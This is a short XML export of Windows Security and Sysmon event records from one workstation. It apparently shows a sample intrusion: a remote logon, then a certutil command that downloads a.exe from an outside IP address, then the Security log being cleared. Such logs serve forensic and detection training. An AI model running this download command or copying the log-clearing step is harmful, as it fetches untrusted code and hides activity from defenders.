<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}"/><EventID>4624</EventID><TimeCreated SystemTime="2026-03-03T09:38:02.5512340Z"/><EventRecordID>88213</EventRecordID><Channel>Security</Channel><Computer>ws-017.corp.example.com</Computer></System><EventData><Data Name="SubjectUserSid">S-1-5-18</Data><Data Name="TargetUserName">jsmith</Data><Data Name="TargetDomainName">CORP</Data><Data Name="LogonType">10</Data><Data Name="LogonProcessName">User32</Data><Data Name="AuthenticationPackageName">Negotiate</Data><Data Name="WorkstationName">WS-017</Data><Data Name="IpAddress">198.51.100.23</Data><Data Name="IpPort">0</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}"/><EventID>4688</EventID><TimeCreated SystemTime="2026-03-03T09:41:12.2031200Z"/><EventRecordID>88240</EventRecordID><Channel>Security</Channel><Computer>ws-017.corp.example.com</Computer></System><EventData><Data Name="SubjectUserName">jsmith</Data><Data Name="NewProcessId">0x1a2c</Data><Data Name="NewProcessName">C:\Windows\System32\certutil.exe</Data><Data Name="TokenElevationType">%%1938</Data><Data Name="ProcessId">0x16f0</Data><Data Name="CommandLine">certutil -urlcache -f http://203.0.113.9/a.txt a.exe</Data><Data Name="ParentProcessName">C:\Windows\System32\cmd.exe</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"/><EventID>1</EventID><TimeCreated SystemTime="2026-03-03T09:41:12.2140000Z"/><EventRecordID>5120</EventRecordID><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>ws-017.corp.example.com</Computer></System><EventData><Data Name="UtcTime">2026-03-03 09:41:12.204</Data><Data Name="ProcessId">6700</Data><Data Name="Image">C:\Windows\System32\certutil.exe</Data><Data Name="CommandLine">certutil -urlcache -f http://203.0.113.9/a.txt a.exe</Data><Data Name="User">CORP\jsmith</Data><Data Name="IntegrityLevel">Medium</Data><Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data><Data Name="ParentCommandLine">cmd.exe /c certutil -urlcache -f http://203.0.113.9/a.txt a.exe</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Eventlog" Guid="{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"/><EventID>1102</EventID><TimeCreated SystemTime="2026-03-03T09:47:30.0100000Z"/><EventRecordID>88301</EventRecordID><Channel>Security</Channel><Computer>ws-017.corp.example.com</Computer></System><UserData><LogFileCleared xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog"><SubjectUserName>jsmith</SubjectUserName><SubjectDomainName>CORP</SubjectDomainName></LogFileCleared></UserData></Event>
</Events>
